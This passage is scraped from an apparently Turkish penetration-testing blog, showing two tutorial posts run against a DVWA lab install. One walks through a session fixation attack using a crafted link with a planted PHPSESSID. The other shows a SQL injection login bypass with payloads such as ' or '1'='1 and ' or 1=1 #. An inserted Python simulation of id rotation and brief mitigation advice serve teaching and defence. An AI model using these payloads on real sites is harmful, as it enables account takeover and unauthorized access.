<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVLppFxlOo89BKZrWVoa8fqBl6Gobj_XHF12eckmX-H1UsSL9CZ0C9CbZFe9d73isxU9tOr5EPC8k_KY7ZAhgvltMxOZrTNXRgwhVc6S9hYZXnKZileC9jzb4NwgefLlDsKBY7L0ZDojA/s1600/o5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVLppFxlOo89BKZrWVoa8fqBl6Gobj_XHF12eckmX-H1UsSL9CZ0C9CbZFe9d73isxU9tOr5EPC8k_KY7ZAhgvltMxOZrTNXRgwhVc6S9hYZXnKZileC9jzb4NwgefLlDsKBY7L0ZDojA/s1600/o5.png" width="392" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Refreshing the page clears the error. Clicking the</span><strong style="background-color: white;"> Reset/setup the database</strong><span style="background-color: white;"> link completes the installation.</span></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-85908735368719804142014-09-30T11:06:00.001+03:002014-10-24T14:34:55.137+03:00Testing the Session Fixation Attack<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong style="background-color: white; color: #333333;">Session Fixation</strong><span style="background-color: white; color: #333333;"> attacks stem from a weakness in the </span><strong style="background-color: white; color: #333333;">"Session id"</strong><span style="background-color: white; color: #333333;"> value that the browser or the site presents to us when we log in to a web site. The attack succeeds because the Session id assigned to us while logging in and the Session id assigned after login are </span><strong style="background-color: white; color: #333333;">the same</strong><span style="background-color: white; color: #333333;">. The attacker carries it out by getting us to browse the site with a different Session id value (that is, by getting the site to accept the session id the attacker sent). When the attack succeeds, the attacker performs actions on the site with our identity without logging in.</span></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4lcP5zO2yKplqBDUyHSX2_2WRTBqXXVYWUfKkA8CtjFLyx7yDSZHQ4KwOKRu4THfX1-VIOy3T_jKYAhvxphou7Y3hKfl4HUbdWeHWWe-H5bh7p6iD2HH6o3Qv9zStL-HhkjJnAxo8Qnc/s1600/s1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4lcP5zO2yKplqBDUyHSX2_2WRTBqXXVYWUfKkA8CtjFLyx7yDSZHQ4KwOKRu4THfX1-VIOy3T_jKYAhvxphou7Y3hKfl4HUbdWeHWWe-H5bh7p6iD2HH6o3Qv9zStL-HhkjJnAxo8Qnc/s1600/s1.png" height="327" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Now let's carry out this attack step by step.<br />
<br />
<a name='more'></a><br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong>Stage 1:</strong> The victim logs in to the site.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRRWOc-VVQxDuJECrMqqNOLvDhJMVHg9uYPQ9YDIrT1I6-r9eypaR8Z6aRcyfZvWecFL4B3RqPr5iSipGUN-aZ3NFgPO6xBR_KUzi-v2V-yiqNyqXIqJjnVtpdQlO3BysQx6t-wThjmb8/s1600/s2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRRWOc-VVQxDuJECrMqqNOLvDhJMVHg9uYPQ9YDIrT1I6-r9eypaR8Z6aRcyfZvWecFL4B3RqPr5iSipGUN-aZ3NFgPO6xBR_KUzi-v2V-yiqNyqXIqJjnVtpdQlO3BysQx6t-wThjmb8/s1600/s2.png" height="260" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<strong style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Stage 2:</strong><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> The site generates a session id value for the user.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiETlhyphenhyphenk1IyvUY2v8am1t0d3UmA0bbNV_W9RWiue2Tts44_q5zHEbjWV5lNzWU9CmSt3BTc-_LrRnNdwQq1qlrJHFtzQVMRTsiGVpidPEteAj1MBP1SN_W5CmeDV-10_aBfINAPrxwVWZQ/s1600/s3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiETlhyphenhyphenk1IyvUY2v8am1t0d3UmA0bbNV_W9RWiue2Tts44_q5zHEbjWV5lNzWU9CmSt3BTc-_LrRnNdwQq1qlrJHFtzQVMRTsiGVpidPEteAj1MBP1SN_W5CmeDV-10_aBfINAPrxwVWZQ/s1600/s3.png" height="141" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<strong style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Stage 3:</strong><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> While the victim browses the site, the Session Id value stays the same.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVRBPLOcwwFEVrc9dhxt141iZ59bRHnGZHgS4GvlvCj_hBIkV-F1E-SHqTxat2apdDKVOTUB9FR8FOUZsBgzpKzmJmTop6r1zBlod25Cg5MsxZg_B9j93SPNCXaPFq1r1OzgB0DUzqaBE/s1600/s4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVRBPLOcwwFEVrc9dhxt141iZ59bRHnGZHgS4GvlvCj_hBIkV-F1E-SHqTxat2apdDKVOTUB9FR8FOUZsBgzpKzmJmTop6r1zBlod25Cg5MsxZg_B9j93SPNCXaPFq1r1OzgB0DUzqaBE/s1600/s4.png" height="26" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<strong style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Stage 4:</strong><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> The attacker generates a Session Id value for the site to be attacked.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQjj-I3Ro0FAUi2F-AjczosNdOTs9wJTBYPZDqRe-aS0iJ1aukeRRvURYtIQg7H7boxyNBeJOyIHy2a9TvW8rXpaz6WeeOxIs3HUbUZwCYHaY_d-oTQCNkE9GI4SHmYwqc6u6m2DYT4VY/s1600/s5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQjj-I3Ro0FAUi2F-AjczosNdOTs9wJTBYPZDqRe-aS0iJ1aukeRRvURYtIQg7H7boxyNBeJOyIHy2a9TvW8rXpaz6WeeOxIs3HUbUZwCYHaY_d-oTQCNkE9GI4SHmYwqc6u6m2DYT4VY/s1600/s5.png" height="216" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong style="color: #333333;">Stage 5: </strong><span style="color: #333333;">The attacker sends this Session Id value to the victim by e-mail or similar means. When the victim clicks the link </span><span style="color: red;">(<a data-mce-href="http://goo.gl/J9G6cO" href="http://goo.gl/J9G6cO">http://goo.gl/J9G6cO</a>)</span><span style="color: #333333;">, which contains the URL below, the server has been made to accept the Session id (</span><strong style="color: #333333;">PHPSESSID=nhpprj9s9dv9gvlmdkebiitkm3</strong><span style="color: #333333;">) that the attacker prepared for the attack.</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; line-height: 19px;">
<span style="color: red; font-size: x-small;"><a data-mce-href="http://goo.gl/J9G6cO%20----> http://fbhportal.com/dvwa/vulnerabilities/sqli/?id=1&PHPSESSID=nhpprj9s9dv9gvlmdkebiitkm3" href="http://goo.gl/J9G6cO%20----%3E%20http://fbhportal.com/dvwa/vulnerabilities/sqli/?id=1&PHPSESSID=nhpprj9s9dv9gvlmdkebiitkm3">http://goo.gl/J9G6cO ----> http://fbhportal.com/dvwa/vulnerabilities/sqli/?id=1&PHPSESSID=nhpprj9s9dv9gvlmdkebiitkm3</a></span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT_8y9F2HteqbkgJbBMpE6Aamhf-Q8ZxDVk3C_Pioixu1pzRlkDI7g_0DIl84Qe8d28LErixjfrefGhxQ8hioKoA17ExBTmJLbg7qkOcwLZyA9Q0219soubsVzYW-uvLhT80uSQw9ugLE/s1600/s6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT_8y9F2HteqbkgJbBMpE6Aamhf-Q8ZxDVk3C_Pioixu1pzRlkDI7g_0DIl84Qe8d28LErixjfrefGhxQ8hioKoA17ExBTmJLbg7qkOcwLZyA9Q0219soubsVzYW-uvLhT80uSQw9ugLE/s1600/s6.png" height="43" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<strong style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Stage 6:</strong><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> While the victim browses the site, the session id value is as shown below.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCx03gXwcF3ejKmUhlDeFDqvpOdnhk75u63bWBYBjz86eZLEQ1h3dMSPFecT9T6hvGEJuzFeAbvo6i4a2mZ5lZ48mMlmn2ctvgmRRlIUaXQHC4Ez4Nhx3yIoZ_b9fzD3_QdbB8oxrJ4y0/s1600/s7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCx03gXwcF3ejKmUhlDeFDqvpOdnhk75u63bWBYBjz86eZLEQ1h3dMSPFecT9T6hvGEJuzFeAbvo6i4a2mZ5lZ48mMlmn2ctvgmRRlIUaXQHC4Ez4Nhx3yIoZ_b9fzD3_QdbB8oxrJ4y0/s1600/s7.png" height="35" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<strong style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px; text-align: start;"><br /></strong></div>
<div class="separator" style="clear: both; text-align: center;">
<strong style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px; text-align: start;"><br /></strong></div>
<div class="separator" style="clear: both; text-align: left;">
<strong style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Stage 7:</strong><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> The attacker opens the address in the link sent to the victim and acts on the site without logging in.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px; text-align: start;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJvMW5bDGzxwlvoJeY4V3CSCfSmY9lz_83rAs53KgAOf8tIxmK04mFJIpnAbnzDvM4sPUdoLNSI27MBVzCOhEayfygIKSt6FYiOcr8TtZhxjEuMjWC7DD2ZDP2RUOFvhK5NaeinySJyak/s1600/sessionfix_7-1024x160.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJvMW5bDGzxwlvoJeY4V3CSCfSmY9lz_83rAs53KgAOf8tIxmK04mFJIpnAbnzDvM4sPUdoLNSI27MBVzCOhEayfygIKSt6FYiOcr8TtZhxjEuMjWC7DD2ZDP2RUOFvhK5NaeinySJyak/s1600/sessionfix_7-1024x160.png" height="62" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px; text-align: start;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px; text-align: start;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<strong style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Stage 8:</strong><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> The attacker has now obtained the victim's information. The attack succeeded.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOesTVRCsmFjSaFDajKVMZzGm1AMeafM3Vr_opKPnt4TROBeqV77j9KcW5XmsFFxHTi1W1iO9IeJzEp4TkTvwTUiq9KVS_uwOEWspueLqli-iY4y66IP_-w7maiuH1smbZ8mkrZfrHsEY/s1600/sessionfix_8-1024x620.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOesTVRCsmFjSaFDajKVMZzGm1AMeafM3Vr_opKPnt4TROBeqV77j9KcW5XmsFFxHTi1W1iO9IeJzEp4TkTvwTUiq9KVS_uwOEWspueLqli-iY4y66IP_-w7maiuH1smbZ8mkrZfrHsEY/s1600/sessionfix_8-1024x620.png" height="241" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As for a solution, what I can say is this: using fewer sessions, encrypting the session values that are used, designing session values so that they cannot be linked to one another, and configuring session lifetimes well make a site less affected by this type of attack.</div>
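<div class="separator" style="clear: both; text-align: left;">
The condition named at the start of this post (the Session id is the same before and after login) can be checked directly. The following is an added example, not code from this post, DVWA or PHP: a toy Python session table (all class and function names are assumptions) that reports which user a second client reaches by replaying the pre-login id, with and without rotating the id at login. The sample id is the PHPSESSID value quoted in Stage 5.</div>

```python
import secrets

# Session id quoted in Stage 5 of the post, used here only as sample input.
PAGE_SID = "nhpprj9s9dv9gvlmdkebiitkm3"


class SessionStore:
    """Toy server-side session table (assumed model, not PHP's or DVWA's code)."""

    def __init__(self, rotate_on_login, adopt_unknown_ids=False):
        self.rotate_on_login = rotate_on_login
        self.adopt_unknown_ids = adopt_unknown_ids
        self._sessions = {}          # session id -> logged-in user, or None

    def _issue(self):
        sid = secrets.token_hex(16)
        self._sessions[sid] = None
        return sid

    def request(self, presented_sid=None):
        """Handle one request; return the session id the server binds to it."""
        if presented_sid in self._sessions:
            return presented_sid
        if presented_sid is not None and self.adopt_unknown_ids:
            # Weak setting: an id the server never issued becomes a live session
            # (PHP guards against this with session.use_strict_mode).
            self._sessions[presented_sid] = None
            return presented_sid
        return self._issue()

    def login(self, sid, user):
        """Authenticate `user` on session `sid`; return the id valid afterwards."""
        if self.rotate_on_login:
            # Fix: retire the pre-login id and issue a fresh one
            # (PHP: session_regenerate_id(true) right after authentication).
            self._sessions.pop(sid, None)
            sid = self._issue()
        self._sessions[sid] = user
        return sid

    def user_for(self, sid):
        return self._sessions.get(sid)


def fixation_check(store, planted_sid=None):
    """Return the user a second client reaches by presenting the id the first
    client held before logging in. None means the session is not exposed."""
    # The id is either planted from outside or issued by the server beforehand.
    known_sid = planted_sid if planted_sid is not None else store.request()
    pre_login = store.request(known_sid)     # first client arrives with the id
    store.login(pre_login, "victim")         # ...and then authenticates
    return store.user_for(known_sid)         # second client replays the same id


if __name__ == "__main__":
    cases = [
        ("adopts unknown id, no rotation", SessionStore(False, True), PAGE_SID),
        ("rejects unknown id, no rotation", SessionStore(False, False), PAGE_SID),
        ("server-issued id, no rotation", SessionStore(False), None),
        ("server-issued id, rotation on login", SessionStore(True), None),
    ]
    for label, store, sid in cases:
        print(f"{label:38s} -> {fixation_check(store, sid)}")
```

Rejecting unknown ids is not enough on its own when the id was issued by the server, as in Stage 4; only rotation at login leaves the replayed id without an authenticated session.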
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-30754114976742410612014-09-30T09:39:00.002+03:002014-10-24T14:34:34.215+03:00Bypassing the Login-Authentication Area with SQL Injection<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Bypassing the login-authentication area with SQL injection is an attack method that exploits a vulnerability in the queries behind database-backed fields on dynamic pages (pages where users interact with a database).</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
We log in to web pages we are members of by entering our registered username and password in the login area. But if the database code that checks whether we are registered contains a vulnerability, can we use it without being a member?</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhanVOaDw-7Unqy2BPKZcMxjuqVFED8sn0nCuoODbr135AvUTrTlQMfgI4gGBAaHOKQoX6I7ab6-J3B4_Lh_AIgufrHtCxyTclRINvQA-bFTwk9qGojWqhyphenhypheni7TVv7heNYe_MZ1SZ4CcqkU/s1600/sql-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhanVOaDw-7Unqy2BPKZcMxjuqVFED8sn0nCuoODbr135AvUTrTlQMfgI4gGBAaHOKQoX6I7ab6-J3B4_Lh_AIgufrHtCxyTclRINvQA-bFTwk9qGojWqhyphenhypheni7TVv7heNYe_MZ1SZ4CcqkU/s1600/sql-1.png" height="200" width="400" /></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
-> <em><b>Select * from uyeler where username=<span data-mce-style="color: #ff0000;" style="color: red;">' '</span> and password=<span data-mce-style="color: #ff0000;" style="color: red;">' '</span> ;</b></em> How can this query structure be exploited?</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br />
<a name='more'></a><br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
-> With <em><b>Select * from uyeler where username=<span data-mce-style="color: #ff0000;" style="color: red;">'</span>ali<span data-mce-style="color: #ff0000;" style="color: red;"> '</span> and password=<span data-mce-style="color: #ff0000;" style="color: red;">'</span>1234<span data-mce-style="color: #ff0000;" style="color: red;"> '</span></b></em> the query fetches the registered record and, if the user is a member, logs them in. But what if the username and password values are as follows?</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
-> <b><em>username=empty</em> password=<em>' or '1'='1</em> </b> Now let's plug these into the SQL code.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="color: #333333;">-> </span><b><em style="color: #333333;">Select * from uyeler where username=<span data-mce-style="color: #ff0000;" style="color: red;">' </span> <span data-mce-style="color: #ff0000;" style="color: red;">'</span> and password=</em><em><span data-mce-style="color: #ff0000;" style="color: red;">'</span><span style="color: #333333;"> </span><em><span style="color: #333333;">' </span><span style="color: #e69138;">or '1'='1</span></em><span data-mce-style="color: #ff0000;"><span style="color: #e69138;">'</span></span></em></b><span style="color: #333333;"> is the query that results.</span></div>
<div style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="color: #333333;"><br /></span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
As a result, with the query <em><b> Select * from uyeler where username=<span data-mce-style="color: #ff0000;" style="color: red;">' </span> <span data-mce-style="color: #ff0000;" style="color: red;">'</span> and password=</b></em><strong><em><span data-mce-style="color: #ff0000;" style="color: red;">'</span> ' <em>or '1'='1</em><span data-mce-style="color: #ff0000;" style="color: red;">' </span> </em> </strong>the <b>username</b> and <b>password </b>values are empty, but because <b>1=1</b> is always true, the database treats the operation as successful, as if the table contained someone whose <b>username </b>and <b>password </b>are both empty, and logs us in to the web site. Let's test it.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs1yjdlltYD-ew7R2XAAQvAIqj4_ERy3oTg8sTLjdqzXVd3mYumS2nD9mdMiTm_5fgsgzYzLeBTn7LK9XT4zMIjcJMAddOBVXU4r3Fn_OkgwW-bmAEVEGp6HkkM8eE3jCTU6MWIShD65E/s1600/sql-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs1yjdlltYD-ew7R2XAAQvAIqj4_ERy3oTg8sTLjdqzXVd3mYumS2nD9mdMiTm_5fgsgzYzLeBTn7LK9XT4zMIjcJMAddOBVXU4r3Fn_OkgwW-bmAEVEGp6HkkM8eE3jCTU6MWIShD65E/s1600/sql-2.png" height="337" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">We sent a query to the system with <b>username=www</b> and <b>password=' or '1'='1 </b>. Because <b>or 1=1</b> automatically makes the expressions on its left and right true, the first row in the table is returned as the result. If we want, we can instead enter </span><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><b>' or 1=1 #</b></span><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> in the username field, which turns the <b>password</b> value and everything after it into a comment, and we still log in.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi12V2FW9TAC5ZnEKvjMyUONb8uMp4UbgxlH5u1c0o6siduB4hjzDMxgwPNET6mbUzZ4-xfiYTDl8bYC4UmLSWpDODW5OkZnbgRqNYr_WcSZ9CcS7BC5akKxDLwGyWsQFJG2z08DlZF3SY/s1600/sql-31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi12V2FW9TAC5ZnEKvjMyUONb8uMp4UbgxlH5u1c0o6siduB4hjzDMxgwPNET6mbUzZ4-xfiYTDl8bYC4UmLSWpDODW5OkZnbgRqNYr_WcSZ9CcS7BC5akKxDLwGyWsQFJG2z08DlZF3SY/s1600/sql-31.png" height="337" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">As the image below shows, the </span><em style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><strong><span data-mce-style="color: #ff0000;" style="color: red;">username=admin; uid=1; and cookie</span></strong></em><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> values have been populated.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvddfUw_c6hZwQZNRcsVRtMGacQDVX8TKAaAyA4x6ixfA5PYOJPM5c3-RLxCA47mvnFyhxvmiM4FbmQ5cIe1H52gNB5GFNgHPETy3aa2uyZnHv07MSaY0ud9g_-A6-OTMwfz68dSoa1i0/s1600/sql-41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvddfUw_c6hZwQZNRcsVRtMGacQDVX8TKAaAyA4x6ixfA5PYOJPM5c3-RLxCA47mvnFyhxvmiM4FbmQ5cIe1H52gNB5GFNgHPETy3aa2uyZnHv07MSaY0ud9g_-A6-OTMwfz68dSoa1i0/s1600/sql-41.png" height="230" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">In the image below we see the user who was logged in.</span></div>
<div class="separator" style="clear: both; text-align: center;">
